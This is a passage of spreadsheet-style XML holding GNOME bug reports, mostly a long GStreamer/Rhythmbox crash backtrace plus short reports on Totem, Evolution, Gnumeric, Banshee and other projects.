    at e-book-backend-file.c:660
	closure = (FileBackendSearchClosure *) 0x0
#11 0x4003d6e2 in e_book_backend_stop_book_view (backend=0x8071128 
    book_view=0x8339a80) at e-book-backend.c:324
	__PRETTY_FUNCTION__ = e_book_backend_stop_book_view
#12 0x40040215 in view_listener_died_cb (cnx=0x8251fd8
user_data=0x804d5f4)
    at e-data-book-view.c:55
No locals.
#13 0x408ef8b1 in link_connection_unref () from
/opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#14 0x408ef923 in link_connection_unref () from
/opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#15 0x409a7941 in g_child_watch_add () from
/opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#16 0x409a535c in g_main_context_dispatch ()
   from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#17 0x409a87cb in g_main_context_check () from
/opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#18 0x409a8ae7 in g_main_loop_run () from
/opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#19 0x4082ec83 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
No symbol table info available.
#20 0x0804bd05 in main (argc=3 argv=0x805c0d0) at server.c:347
	offline_listener = (OfflineListener *) 0x806da10
#0  0xffffe410 in ?? ()
------- Bug created by bug-buddy at 2006-10-10 12:31 -------
</t>
  </si>
  <si>
    <t>simon.major+bugz</t>
  </si>
  <si>
    <t>TOTEM-624607</t>
  </si>
  <si>
    <t>Redundant window_on_top GConf key</t>
  </si>
  <si>
    <t>As described on launchpad bug https://bugs.edge.launchpad.net/ubuntu/+source/totem/+bug/514863  Totem ignores the window_on_top GConf setting.
-------------------------------------
Steps to reproduce:
1) Open gconf-editor and set Totem to display on top of other windows: Apps | Totem | window_on_top
2) Open a video - note that the Totem window doesn't stay on top of other windows.</t>
  </si>
  <si>
    <t>bilalakhtar</t>
  </si>
  <si>
    <t>BANSHEE-336001</t>
  </si>
  <si>
    <t>[PATCH] Drastically reduce the number of status bar updates</t>
  </si>
  <si>
    <t>Reduces the amount of statusbar updates drastically without noticable
regressions in the user experience. Before this the status bar updating
routines were called every time a song was added or deleted.
I have no real numbers whether this actually speeds up things but common sense
(and a very subjective feeling) tells me it does.</t>
  </si>
  <si>
    <t>TOTEM-365278</t>
  </si>
  <si>
    <t>Trying to play fd://0 when using 'Open with Totem Movie Player'.</t>
  </si>
  <si>
    <t>When i try to open this video in Totem with the right-click menu it tries to play fd://0 instead of http://thatvideosite.voxcdn.com/core/2024/james_blunt_beautiful_parody.wmv.
URL: http://www.thatvideosite.com/video/2024
Other information:
Totem-CVS(Gstreamer)</t>
  </si>
  <si>
    <t>CHRONOJUMP-495280</t>
  </si>
  <si>
    <t>Fix dabase dependency for the future</t>
  </si>
  <si>
    <t>when client software is newer it updates the database.
In the other way when database is newer than software (moving .db file from one computer to another) nothing is done.
The best is detect this and show a message that client should be updated.</t>
  </si>
  <si>
    <t>GARNOME-134793</t>
  </si>
  <si>
    <t>libtool patch jhbuild-fixes.diff contains a typo</t>
  </si>
  <si>
    <t>At line 36 col 96 of libtool patch jhbuild-fixes.diff this typo:
${w}l instead of ${wl}
may crash libtool in some (rare) circumstances.</t>
  </si>
  <si>
    <t>EVOLUTION-245765</t>
  </si>
  <si>
    <t>Calender Summary does not wrap or slide (grows window).</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: GNOME2.2.0 1.4
os_details: Gnome.Org
Synopsis: Calender Summary does not wrap or slide (grows window).
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
Description:
Description of Problem:
When adding a summary to an appointment in the calender the appointment
window grows in width as you type past the summary field width.  At some
point the window gets larger than the desktop screen and you can't see
what you're typing.  Previous Evolution versions (1.2.X) slid the text
left as you typed past the end of the field.  This behavior is far
preferable to the current (1.4) behavior.  
Also the summary doesn't wrap in the day view unless the mouse is
placed over the text.  This makes it difficult to view and to edit the
summary from the day view window. 
Steps to reproduce the problem:
1. Calander View
2. Create new appointment
3. Type in summary field until cursor goes to right edge of field.  Keep
typing and observe undesireable behavior.
4.  Make the appointment several hours long.
5. Save appointment and go to day view.  Observe that you can't see all
summary text unless the mouse is place over the non-wrapped summary
text.
Actual Results:
Expected Results:
The summary text should wrap in the day view and allow the user to edit
the text (should wrap as the user types past the end of a line)
The summary field should not grow the edit appointment window as the
user types past the end of the field.
How often does this happen?
Always.
Additional Information:
I use the summary field to log daily events as opposed to the field
below the start and stop times because I can see what I did and for how
long at a glance in the day view window.  It would be very inconvenient
to have to pull up each appointment to view how I spent my time. 
Therefore it's nice to have the ability to use long summaries.  1.2.X
versions of Evolution handled this nicely.
Thanks
Dick 
Unknown reporter: rmm@cantrip.org changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>rmm</t>
  </si>
  <si>
    <t>GNUMERIC-99851</t>
  </si>
  <si>
    <t>Missing shortcuts in File menu</t>
  </si>
  <si>
    <t>The Save As... menu item in the File menu doesn't have a shortcut in the
bonobo version. According to the HIG this should be [Shift]+[Ctrl]+[S].
Note that the non-bonobo version already has the right shortcut.
The Print Preview... menu item in the File menu doesn't have a shortcut
in both the non-bonobo version and the bonobo version (standalone and
embedded). According to the HIG this should be [Shift]+[Ctrl]+[P].
The Print... menu item in the File menu doesn't have a shortcut in the
embedded bonobo version. According to the HIG this should be [Ctrl]+[P].
Note that both the non-bonobo version and the standalone bonobo version
already have the right shortcut.</t>
  </si>
  <si>
    <t>GNUMERIC-152229</t>
  </si>
  <si>
    <t>Problem  making chart from complete rows</t>
  </si>
  <si>
    <t>Put some data in columns A and B. Mark the entire columns. Make a line
or XY chart.
Now insert a row. It doesn't seem to matter where. The chart goes blank. The
data series are now marked #REF in the properties dialog.
Marking entire columns is a natural thing to do when the data sets are large.</t>
  </si>
  <si>
    <t>GSTREAMER-407590</t>
  </si>
  <si>
    <t>crash using gconfaudiosink</t>
  </si>
  <si>
    <t>Version: 0.9.7.90
What were you doing when the application crashed?
Distribution: Unknown
Gnome Release: 2.17.91 2007-02-13 (JHBuild)
BugBuddy Version: 2.17.3
System: Linux 2.6.19.2-mactel #6 SMP PREEMPT Fri Feb 2 21:39:35 CET 2007 i686
X Vendor: The X.Org Foundation
X Vendor Release: 70199002
Selinux: No
Accessibility: Enabled
GTK+ Theme: Clearlooks
Icon Theme: gnome
Memory status: size: 139706368 vsize: 139706368 resident: 45699072 share: 19877888 rss: 45699072 rss_rlim: 4294967295
CPU usage: start_time: 1171396382 rtime: 801 utime: 736 stime: 65 cutime:2 cstime: 2 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/local/bin/rhythmbox'
Using host libthread_db library /lib/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1232185680 (LWP 17071)]
[New Thread -1337984080 (LWP 17470)]
[New Thread -1309553744 (LWP 17463)]
[New Thread -1301161040 (LWP 17462)]
[New Thread -1269830736 (LWP 17459)]
[New Thread -1278223440 (LWP 17446)]
0xb7156081 in process_responses () from /usr/X11R6/lib/libX11.so.6
#0  0xb7156081 in process_responses () from /usr/X11R6/lib/libX11.so.6
#1  0xb7156ae8 in _XEventsQueued () from /usr/X11R6/lib/libX11.so.6
#2  0xb713ac83 in XPending () from /usr/X11R6/lib/libX11.so.6
#3  0xb747862b in gdk_check_xpending ()
   from /usr/local/lib/libgdk-x11-2.0.so.0
#4  0xb747baf5 in gdk_event_prepare () from /usr/local/lib/libgdk-x11-2.0.so.0
#5  0xb6a81eac in g_main_context_prepare () from /usr/lib/libglib-2.0.so.0
#6  0xb6a83e79 in g_main_context_iterate () from /usr/lib/libglib-2.0.so.0
#7  0xb6a84597 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#8  0xb762123a in gtk_main () from /usr/local/lib/libgtk-x11-2.0.so.0
#9  0x080632c4 in main ()
Thread 6 (Thread -1278223440 (LWP 17446)):
#0  0xb7fdc410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6caff2c in pthread_cond_timedwait@@GLIBC_2.3.2 ()
    at ../nptl/sysdeps/unix/sysv/linux/i386/i686/../i486/pthread_cond_timedwait.S:175
No locals.
#2  0xb7f1b2e4 in __pthread_cond_timedwait (cond=0xfffffffc 
    mutex=0xfffffffc abstime=0xfffffffc) at forward.c:151
No locals.
#3  0xb6cbd43b in g_cond_timed_wait_posix_impl ()
   from /usr/lib/libgthread-2.0.so.0
No symbol table info available.
#4  0xb6a5f4de in g_async_queue_pop_intern_unlocked ()
   from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0xb6a5f7c6 in g_async_queue_timed_pop () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x080b3523 in read_queue ()
No symbol table info available.
#7  0x080b403b in action_thread_main ()
No symbol table info available.
#8  0xb6aa5a93 in g_thread_create_proxy () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#9  0xb6cad290 in start_thread (arg=0xb3cfdbb0) at pthread_create.c:261
	__res = 
	__ignore1 = 
	__ignore2 = 
	pd = (struct pthread *) 0xb3cfdbb0
	now = 
	unwind_buf = {cancel_jmp_buf = {{jmp_buf = {-1228177420 0 8195840 
        -1278225176 -1278225264 -1228221852} mask_was_saved = 0}} priv = {
    pad = {0x0 0x0 0x0 0x0} data = {prev = 0x0 cleanup = 0x0 
      canceltype = 0}}}
	not_first_call = 136463128
#10 0xb7f0f55e in clone () from /lib/libc.so.6
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {
    mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 
    mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 
    fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 
    fs_passno = 0}}
	__elf_set___libc_subfreeres_element_fstab_free__ = (
    const void *) 0xb7f4a870
Thread 5 (Thread -1269830736 (LWP 17459)):
#0  0xb7fdc410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6cafcb6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
No symbol table info available.
#2  0xb7f1b29d in __pthread_cond_wait (cond=0xfffffffc mutex=0xfffffffc)
    at forward.c:138
No locals.
#3  0xb6d62abb in gst_system_clock_async_thread (clock=0x898b050)
    at gstsystemclock.c:260
	entry = (GstClockEntry *) 0x898a528
	requested = 13163766627131450424
	res = 3066753856
	sysclock = (GstSystemClock *) 0x898b050
	__PRETTY_FUNCTION__ = gst_system_clock_async_thread
#4  0xb6aa5a93 in g_thread_create_proxy () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0xb6cad290 in start_thread (arg=0xb44febb0) at pthread_create.c:261
	__res = 
	__ignore1 = 
	__ignore2 = 
	pd = (struct pthread *) 0xb44febb0
	now = 
	unwind_buf = {cancel_jmp_buf = {{jmp_buf = {-1228177420 0 8195840 
        -1269832472 -1269832560 -1228221852} mask_was_saved = 0}} priv = {
    pad = {0x0 0x0 0x0 0x0} data = {prev = 0x0 cleanup = 0x0 
      canceltype = 0}}}
	not_first_call = -1230039040
#6  0xb7f0f55e in clone () from /lib/libc.so.6
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {
    mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 
    mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 
    fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 
    fs_passno = 0}}
	__elf_set___libc_subfreeres_element_fstab_free__ = (
    const void *) 0xb7f4a870
Thread 4 (Thread -1301161040 (LWP 17462)):
#0  0xb7fdc410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb7edd71b in ?? () from /lib/libc.so.6
No locals.
#2  0xb7bb065b in libgnomeui_segv_handle ()
   from /usr/local/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0xb7fdc410 in __kernel_vsyscall ()
No symbol table info available.
#5  0xb7e78431 in *__GI_raise (sig=6)
    at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
	resultvar = 
	pid = -1208561676
	selftid = 0
#6  0xb7e79bab in *__GI_abort () at ../sysdeps/generic/abort.c:88
	act = {__sigaction_handler = {sa_handler = 0xb271ba94 
    sa_sigaction = 0xb271ba94} sa_mask = {__val = {2993797800 3086897975 
      2993797780 3086960224 2 3062785392 1 0 1 8 3064927492 
      141984384 17 16 2993797724 1 8 144506888 2993797840 3066805392 
      3064304813 6788756 28251396 0 144770584 2993797736 3064606554 
      12 2993797880 112 141984384 3064927492}} sa_flags = 141984384 
  sa_restorer = 0xb271baf8}
	sigs = {__val = {32 0 }}
#7  0xb6a8a78a in g_logv () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#8  0xb6a8a7c9 in g_log () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#9  0xb54b7282 in gst_gconf_get_key_for_sink_profile (
    profile=GCONF_PROFILE_NONE) at gconf.c:102
	__PRETTY_FUNCTION__ = gst_gconf_get_key_for_sink_profile
#10 0xb54b39f8 in do_change_child (sink=0x827d138) at gstgconfaudiosink.c:149
	key = (
    const gchar *) 0x8911128 8\210\033\bÂ¸\021\203\bÃ \037ÃÂ¶ÃŠ@KÂµ\035AKÂµÃ»8KÂµÃŸCÃ“Â¶ÃžÂ±Ã‘Â¶
	new_gconf_str = (gchar *) 0x1000001 
	new_kid = (GstElement *) 0x81b8838
	__PRETTY_FUNCTION__ = do_change_child
#11 0xb54b426a in gst_gconf_audio_sink_change_state (element=0x827d138 
    transition=GST_STATE_CHANGE_NULL_TO_READY) at gstgconfaudiosink.c:271
	ret = GST_STATE_CHANGE_SUCCESS
	sink = (GstGConfAudioSink *) 0x827d138
#12 0xb6d335f5 in gst_element_change_state (element=0x827d138 
    transition=GST_STATE_CHANGE_NULL_TO_READY) at gstelement.c:2275
	oclass = (GstElementClass *) 0x8911128
	ret = GST_STATE_CHANGE_SUCCESS
	current = GST_STATE_NULL
	next = GST_STATE_READY
	__PRETTY_FUNCTION__ = gst_element_change_state
#13 0xb6d33480 in gst_element_set_state_func (element=0x827d138 
    state=GST_STATE_READY) at gstelement.c:2236
	current = GST_STATE_NULL
	next = GST_STATE_READY
	old_pending = GST_STATE_VOID_PENDING
	ret = 3066752823
	transition = GST_STATE_CHANGE_NULL_TO_READY
	old_ret = GST_STATE_CHANGE_SUCCESS
	__PRETTY_FUNCTION__ = gst_element_set_state_func
#14 0xb6d330c1 in gst_element_set_state (element=0x827d138 
    state=GST_STATE_READY) at gstelement.c:2144
	oclass = (GstElementClass *) 0x8911128
	result = GST_STATE_CHANGE_FAILURE
	__PRETTY_FUNCTION__ = gst_element_set_state
#15 0xb6d206a1 in gst_bin_element_set_state (bin=0x83b45c0 
    element=0x827d138 pending=GST_STATE_READY) at gstbin.c:1767
	ret = GST_STATE_CHANGE_SUCCESS
	locked = 0
	__PRETTY_FUNCTION__ = gst_bin_element_set_state
#16 0xb6d20c74 in gst_bin_change_state_func (element=0x83b45c0 
    transition=GST_STATE_CHANGE_NULL_TO_READY) at gstbin.c:1931
	child = (GstElement *) 0x827d138
	data = (gpointer) 0x827d138
	bin = (GstBin *) 0x83b45c0
	ret = 3064586818
	current = GST_STATE_NULL
	next = GST_STATE_READY
	have_async = 0
	have_no_preroll = 0
	base_time = 0
	it = (GstIterator *) 0x89c4e40
	done = 0
	__PRETTY_FUNCTION__ = gst_bin_change_state_func
#17 0xb6d335f5 in gst_element_change_state (element=0x83b45c0 
    transition=GST_STATE_CHANGE_NULL_TO_READY) at gstelement.c:2275
	oclass = (GstElementClass *) 0x81371d0
	ret = GST_STATE_CHANGE_SUCCESS
	current = GST_STATE_NULL
	next = GST_STATE_READY
	__PRETTY_FUNCTION__ = gst_element_change_state
#18 0xb6d33480 in gst_element_set_state_func (element=0x83b45c0 
    state=GST_STATE_READY) at gstelement.c:2236
	current = GST_STATE_NULL
	next = GST_STATE_READY
	old_pending = GST_STATE_VOID_PENDING
	ret = 3066752823
	transition = GST_STATE_CHANGE_NULL_TO_READY
	old_ret = GST_STATE_CHANGE_SUCCESS
	__PRETTY_FUNCTION__ = gst_element_set_state_func
#19 0xb6d330c1 in gst_element_set_state (element=0x83b45c0 
    state=GST_STATE_READY) at gstelement.c:2144
	oclass = (GstElementClass *) 0x81371d0
	result = GST_STATE_CHANGE_FAILURE
	__PRETTY_FUNCTION__ = gst_element_set_state
#20 0xb6d206a1 in gst_bin_element_set_state (bin=0x89d8b98 
    element=0x83b45c0 pending=GST_STATE_READY) at gstbin.c:1767
	ret = GST_STATE_CHANGE_SUCCESS
	locked = 0
	__PRETTY_FUNCTION__ = gst_bin_element_set_state
#21 0xb6d20c74 in gst_bin_change_state_func (element=0x89d8b98 
    transition=GST_STATE_CHANGE_NULL_TO_READY) at gstbin.c:1931
	child = (GstElement *) 0x83b45c0
	data = (gpointer) 0x83b45c0
	bin = (GstBin *) 0x89d8b98
	ret = GST_STATE_CHANGE_SUCCESS
	current = GST_STATE_NULL
	next = GST_STATE_READY
	have_async = 0
	have_no_preroll = 0
	base_time = 0
	it = (GstIterator *) 0xb04306f0
	done = 0
	__PRETTY_FUNCTION__ = gst_bin_change_state_func
#22 0xb6d335f5 in gst_element_change_state (element=0x89d8b98 
    transition=GST_STATE_CHANGE_NULL_TO_READY) at gstelement.c:2275
	oclass = (GstElementClass *) 0x81371d0
	ret = GST_STATE_CHANGE_SUCCESS
	current = GST_STATE_NULL
	next = GST_STATE_READY
	__PRETTY_FUNCTION__ = gst_element_change_state
#23 0xb6d33480 in gst_element_set_state_func (element=0x89d8b98 
    state=GST_STATE_PAUSED) at gstelement.c:2236
	current = GST_STATE_NULL
	next = GST_STATE_READY
	old_pending = GST_STATE_VOID_PENDING
	ret = 3041682622
	transition = GST_STATE_CHANGE_NULL_TO_READY
	old_ret = GST_STATE_CHANGE_SUCCESS
	__PRETTY_FUNCTION__ = gst_element_set_state_func
#24 0xb6d330c1 in gst_element_set_state (element=0x89d8b98 
    state=GST_STATE_PAUSED) at gstelement.c:2144
	oclass = (GstElementClass *) 0x81371d0
	result = GST_STATE_CHANGE_FAILURE
	__PRETTY_FUNCTION__ = gst_element_set_state
#25 0xb54c176f in add_sink (play_bin=0x8910078 sink=0x89d8b98 
    srcpad=0xb0404240 subtitle_pad=0x0) at gstplaybin.c:1422
	sinkpad = (GstPad *) 0x1
	linkres = -1227173272
	parent = (GstElement *) 0x85726e0
	stateret = 3067282197
	state = GST_STATE_PAUSED
	__PRETTY_FUNCTION__ = add_sink
#26 0xb54c1cd3 in setup_sinks (play_base_bin=0x8910078 group=0xb040eec8)
    at gstplaybin.c:1548
	play_bin = (GstPlayBin *) 0x8910078
	streaminfo = (GList *) 0x8761d40
	s = (GList *) 0x0
	need_vis = 1
	need_text = 0
	textsrcpad = (GstPad *) 0x0
	pad = (GstPad *) 0xb0404240
	sink = (GstElement *) 0x89d8b98
	res = 1
	__PRETTY_FUNCTION__ = setup_sinks
#27 0xb54c42bc in group_commit (play_base_bin=0x8910078 fatal=0 subtitle=0)
    at gstplaybasebin.c:462
	group = (GstPlayBaseGroup *) 0xb040eec8
	had_active_group = 0
	res = 3
	__PRETTY_FUNCTION__ = group_commit
#28 0xb54c64b8 in no_more_pads_full (element=0x898b6a8 subs=0 
    play_base_bin=0x8910078) at gstplaybasebin.c:1052
	__PRETTY_FUNCTION__ = no_more_pads_full
#29 0xb54c64de in no_more_pads (element=0x898b6a8 play_base_bin=0x8910078)
    at gstplaybasebin.c:1059
No locals.
#30 0xb6cd99fb in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#31 0xb6ccc3a9 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#32 0xb6cdd06b in signal_emit_unlocked_R () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#33 0xb6cde5d0 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#34 0xb6cde939 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#35 0xb6d2fc3b in gst_element_no_more_pads (element=0x898b6a8)
    at gstelement.c:820
	__PRETTY_FUNCTION__ = gst_element_no_more_pads
#36 0xb545df5b in dynamic_remove (dynamic=0x891fd68) at gstdecodebin.c:1291
	decode_bin = (GstDecodeBin *) 0x898b6a8
	__PRETTY_FUNCTION__ = dynamic_remove
#37 0xb545e02f in no_more_pads (element=0x8a70008 dynamic=0x891fd68)
    at gstdecodebin.c:1308
	__PRETTY_FUNCTION__ = no_more_pads
#38 0xb6cd99fb in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#39 0xb6ccc3a9 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#40 0xb6cdd06b in signal_emit_unlocked_R () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#41 0xb6cde5d0 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#42 0xb6cde939 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#43 0xb6d2fc3b in gst_element_no_more_pads (element=0x8a70008)
    at gstelement.c:820
	__PRETTY_FUNCTION__ = gst_element_no_more_pads
#44 0xb5431f54 in gst_ogg_demux_activate_chain (ogg=0x8a70008 
    chain=0xb04028f0 event=0x89814a0) at gstoggdemux.c:1818
	i = 1
	__PRETTY_FUNCTION__ = gst_ogg_demux_activate_chain
#45 0xb54343c4 in gst_ogg_demux_perform_seek (ogg=0x8a70008 event=0x0)
    at gstoggdemux.c:2183
	event = (GstEvent *) 0x89814a0
	stop = 229575691609
	start = 0
	last_stop = 0
	chain = (GstOggChain *) 0xb04028f0
	res = 1
	flush = 0
	accurate = 0
	format = GST_FORMAT_UNDEFINED
	rate = 1
	flags = GST_SEEK_FLAG_NONE
	cur_type = GST_SEEK_TYPE_NONE
	stop_type = 3469959
	cur = 14903360423460864
	stop = 145162248
	update = -1253876738
	__PRETTY_FUNCTION__ = gst_ogg_demux_perform_seek
#46 0xb5437097 in gst_ogg_demux_loop (pad=0x89cef08) at gstoggdemux.c:3020
	res = -1230039040
	ogg = (GstOggDemux *) 0x8a70008
	ret = GST_FLOW_OK
	event = (GstEvent *) 0x0
	__PRETTY_FUNCTION__ = gst_ogg_demux_loop
#47 0xb6d69196 in gst_task_func (task=0xb2b1a330 tclass=0x894e758)
    at gsttask.c:192
	lock = (GStaticRecMutex *) 0x89c70c8
	tself = (GThread *) 0x89c8d60
	__PRETTY_FUNCTION__ = gst_task_func
#48 0xb6aa8342 in g_thread_pool_thread_proxy () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#49 0xb6aa5a93 in g_thread_create_proxy () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#50 0xb6cad290 in start_thread (arg=0xb271dbb0) at pthread_create.c:261
	__res = 
	__ignore1 = 
	__ignore2 = 
	pd = (struct pthread *) 0xb271dbb0
	now = 
	unwind_buf = {cancel_jmp_buf = {{jmp_buf = {-1228177420 0 8195840 
        -1301162776 -1301162864 -1228221852} mask_was_saved = 0}} priv = {
    pad = {0x0 0x0 0x0 0x0} data = {prev = 0x0 cleanup = 0x0 
      canceltype = 0}}}
	not_first_call = -1230039040
#51 0xb7f0f55e in clone () from /lib/libc.so.6
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {
    mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 
    mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 
    fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 
    fs_passno = 0}}
	__elf_set___libc_subfreeres_element_fstab_free__ = (
    const void *) 0xb7f4a870
Thread 3 (Thread -1309553744 (LWP 17463)):
#0  0xb7fdc410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6cafcb6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
No symbol table info available.
#2  0xb7f1b29d in __pthread_cond_wait (cond=0xfffffffc mutex=0xfffffffc)
    at forward.c:138
No locals.
#3  0xb548c5f6 in gst_queue_loop (pad=0x8a0f640) at gstqueue.c:885
	queue = (GstQueue *) 0x85725f0
	__PRETTY_FUNCTION__ = gst_queue_loop
#4  0xb6d69196 in gst_task_func (task=0xb2b0b1e0 tclass=0x894e758)
    at gsttask.c:192
	lock = (GStaticRecMutex *) 0xb04172a8
	tself = (GThread *) 0x89c8b40
	__PRETTY_FUNCTION__ = gst_task_func
#5  0xb6aa8342 in g_thread_pool_thread_proxy () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0xb6aa5a93 in g_thread_create_proxy () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0xb6cad290 in start_thread (arg=0xb1f1cbb0) at pthread_create.c:261
	__res = 
	__ignore1 = 
	__ignore2 = 
	pd = (struct pthread *) 0xb1f1cbb0
	now = 
	unwind_buf = {cancel_jmp_buf = {{jmp_buf = {-1228177420 0 8195840 
        -1309555480 -1309555568 -1228221852} mask_was_saved = 0}} priv = {
    pad = {0x0 0x0 0x0 0x0} data = {prev = 0x0 cleanup = 0x0 
      canceltype = 0}}}
	not_first_call = -1230039040
#8  0xb7f0f55e in clone () from /lib/libc.so.6
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {
    mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 
    mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 
    fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 
    fs_passno = 0}}
	__elf_set___libc_subfreeres_element_fstab_free__ = (
    const void *) 0xb7f4a870
Thread 2 (Thread -1337984080 (LWP 17470)):
#0  0xb7fdc410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb7edde96 in ?? () from /lib/libc.so.6
No locals.
#2  0xb6aa8c02 in g_usleep () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb546a4c3 in gst_xvimagesink_event_thread (xvimagesink=0x8920ad0)
    at xvimagesink.c:1451
	__PRETTY_FUNCTION__ = gst_xvimagesink_event_thread
#4  0xb6aa5a93 in g_thread_create_proxy () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0xb6cad290 in start_thread (arg=0xb03ffbb0) at pthread_create.c:261
	__res = 
	__ignore1 = 
	__ignore2 = 
	pd = (struct pthread *) 0xb03ffbb0
	now = 
	unwind_buf = {cancel_jmp_buf = {{jmp_buf = {-1228177420 0 8195840 
        -1337985816 -1337985904 -1228221852} mask_was_saved = 0}} priv = {
    pad = {0x0 0x0 0x0 0x0} data = {prev = 0x0 cleanup = 0x0 
      canceltype = 0}}}
	not_first_call = -1230039040
#6  0xb7f0f55e in clone () from /lib/libc.so.6
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {
    mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 
    mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 
    fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 
    fs_passno = 0}}
	__elf_set___libc_subfreeres_element_fstab_free__ = (
    const void *) 0xb7f4a870
Thread 1 (Thread -1232185680 (LWP 17071)):
#0  0xb7156081 in process_responses () from /usr/X11R6/lib/libX11.so.6
No symbol table info available.
#1  0xb7156ae8 in _XEventsQueued () from /usr/X11R6/lib/libX11.so.6
No symbol table info available.
#2  0xb713ac83 in XPending () from /usr/X11R6/lib/libX11.so.6
No symbol table info available.
#3  0xb747862b in gdk_check_xpending ()
   from /usr/local/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#4  0xb747baf5 in gdk_event_prepare () from /usr/local/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#5  0xb6a81eac in g_main_context_prepare () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0xb6a83e79 in g_main_context_iterate () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0xb6a84597 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#8  0xb762123a in gtk_main () from /usr/local/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#9  0x080632c4 in main ()
No symbol table info available.
#0  0xb7156081 in process_responses () from /usr/X11R6/lib/libX11.so.6
The program is running.  Quit anyway (and detach it)? (y or n) [answered Y input not from terminal]
----------- .xsession-errors ---------------------
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
** CRITICAL **: file gconf.c: line 102 (gst_gconf_get_key_for_sink_profile): should not be reached
aborting...
GTK Accessibility Module initialized
Bonobo accessibility support initialized
GTK Accessibility Module initialized
Bonobo accessibility support initialized
--------------------------------------------------</t>
  </si>
  <si>
    <t>GNOME-THEMES-157647</t>
  </si>
  <si>
